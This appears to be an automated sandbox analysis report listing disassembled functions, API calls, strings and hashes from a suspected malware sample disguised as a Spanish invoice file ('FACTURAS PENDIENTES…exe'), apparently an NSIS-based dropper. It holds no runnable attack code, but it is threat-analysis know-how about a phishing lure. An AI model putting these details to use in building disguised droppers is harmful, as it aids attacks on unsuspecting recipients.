                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                  • String ID:
                                  • API String ID: 1042148487-0
                                  • Opcode ID: 34da3a708bdd68606768488eb3c4e4137c7ca334e50fb117c1193af4ef56f34c
                                  • Instruction ID: 6750460e30dce992525df532bb5eaba9793520812dd4d8f0e068ff3be2322e90
                                  • Opcode Fuzzy Hash: 34da3a708bdd68606768488eb3c4e4137c7ca334e50fb117c1193af4ef56f34c
                                  • Instruction Fuzzy Hash: A642BE71A0834ADFD31DCF24C5447AAB7F5FF88310F044A2EE4AAD6294E770D5858B9A
                                  Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                  • Instruction ID: 66eca0b878d1a88cf031bc7713e4e99cd100193794d0d0043917bcbbabee6758
                                  • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                  • Instruction Fuzzy Hash: 37D0EC61414150E9D1606F718D49ABA736DAF05354F204A3EF196E10D1EAB85501932F
                                  Function 004070FB Relevance: .3, Instructions: 310COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                  • Instruction ID: d4ac7d1497c90a7860cde27ccfdf49f9d4c0c6eb7f3b7e6fe9b2edbc2c979ebe
                                  • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                  • Instruction Fuzzy Hash: 79C15B71A0C3918FD364CF29C48036ABBE1FBC5304F10892EE5DA9B391D678A546CB5B
                                  Function 00403D65 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 221windowstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                  • EnableWindow.USER32(?), ref: 00403E11
                                  • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                  • GetSysColor.USER32(?), ref: 00403E4A
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                  • lstrlenW.KERNEL32(?), ref: 00403E6C
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                  • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                  • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                  • SendMessageW.USER32(00000000), ref: 00403EF3
                                  • EnableWindow.USER32(00000000), ref: 00403F10
                                  • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                  • SetCursor.USER32(00000000), ref: 00403FA4
                                    • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                  • SetCursor.USER32(00000000), ref: 00403FE9
                                  • SendMessageW.USER32(00000111,?,00000000), ref: 00404015
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: Call$N
                                  • API String ID: 3270077613-3438112850
                                  • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                  • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                  • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                  • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59
                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128COMMON
                                  Download Yara Rule
                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                  • BeginPaint.USER32(?,?), ref: 0040104C
                                  • GetClientRect.USER32(?,?), ref: 00401062
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                  • DeleteObject.GDI32(00000000), ref: 004010FA
                                  • CreateFontIndirectW.GDI32(?), ref: 00401120
                                  • SetBkMode.GDI32(00000000,?), ref: 00401143
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                  • DrawTextW.USER32(00000000,Tolkningen Setup,000000FF,?,00000820), ref: 00401171
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                  • DeleteObject.GDI32(?), ref: 0040117F
                                  • EndPaint.USER32(?,?), ref: 0040118E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F$Tolkningen Setup
                                  • API String ID: 941294808-2961945220
                                  • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                  • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                  • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                  • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                  Function 004062E1 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124memorystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                  • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                  • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                  • wsprintfA.USER32 ref: 00406360
                                  • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                  • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                  • CloseHandle.KERNEL32(00000000), ref: 00406411
                                    • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                    • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$HfB$HnB$[Rename]
                                  • API String ID: 2900126502-165592708
                                  • Opcode ID: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                  • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                  • Opcode Fuzzy Hash: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                  • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
                                  Function 00402BA3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102memoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                  • GlobalFree.KERNEL32(?), ref: 00402C7E
                                  • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                  • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll, xrefs: 00402CD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 2667972263-3542424732
                                  • Opcode ID: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                  • Instruction ID: 686b8f33fe839f6b04a80afc83e47d853b1ea01e990ec980acb486ddfed3f61f
                                  • Opcode Fuzzy Hash: 6ffc5b8a9f87e2e5b40759ba5e904c63f1369c7a02dc5e0df68b7fff71cda799
                                  • Instruction Fuzzy Hash: 1E310871408351ABD310AF658E49E1FBBE8AF89754F114A3EF590772D2C77888018B9A
                                  Function 00406D18 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D18, 00406D1A
                                  • *?|<>/":, xrefs: 00406D7C
                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                  • API String ID: 589700163-879122614
                                  • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                  • Instruction ID: 6d5cd2c23b7c5e8a6660ed42317bbe46aa043e331069955b4164b8205da208bc
                                  • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                  • Instruction Fuzzy Hash: 9E11D261B0063556DA3067298C4097B72E8DFA97A1756443BFDC6E72C0FB7C8CA193AC
                                  Function 00405736 Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                  • Instruction ID: fd6d678b7fcced70b4665a1fbec2e56912b3eb02c270adc19d2dd25120f6a122
                                  • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                  • Instruction Fuzzy Hash: 4B21F675500B04DFDB749F28DA4895B77B4EF05710B108A3EE896B26A1DB38E814CF24
                                  Function 004056B5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                  • GetMessagePos.USER32 ref: 004056D6
                                  • ScreenToClient.USER32(?,?), ref: 004056F0
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                  • Instruction ID: 0216f53b5c1e39ec49102949a755e2bc9d8ef7e3372eb4174345f74bd41e4177
                                  • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                  • Instruction Fuzzy Hash: C3014C7194020DBBEB01AF94CD45BEEBBB9EF44710F10412AFA50BA1E0C7B49A41DF54
                                  Function 0040362A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00403648
                                  • MulDiv.KERNEL32(000825C8,00000064,000825C8), ref: 00403670
                                  • wsprintfW.USER32 ref: 00403680
                                  • SetWindowTextW.USER32(?,?), ref: 00403690
                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                  Strings
                                  • verifying installer: %d%%, xrefs: 0040367A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                  • Instruction ID: 23416ea20b8bc991085432565deaec88b6a19029d37e317e26b4fa0cf66bde53
                                  • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                  • Instruction Fuzzy Hash: F7016D71540208FBEF24AFA0DE86FAA3B69AB04305F00853EF646B51E0DBB99554CF5D
                                  Function 73472209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 734712F8: GlobalAlloc.KERNEL32(00000040,?,734711C4,-000000A0), ref: 73471302
                                  • GlobalFree.KERNEL32(00000000), ref: 734722F1
                                  • GlobalFree.KERNEL32(00000000), ref: 73472326
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
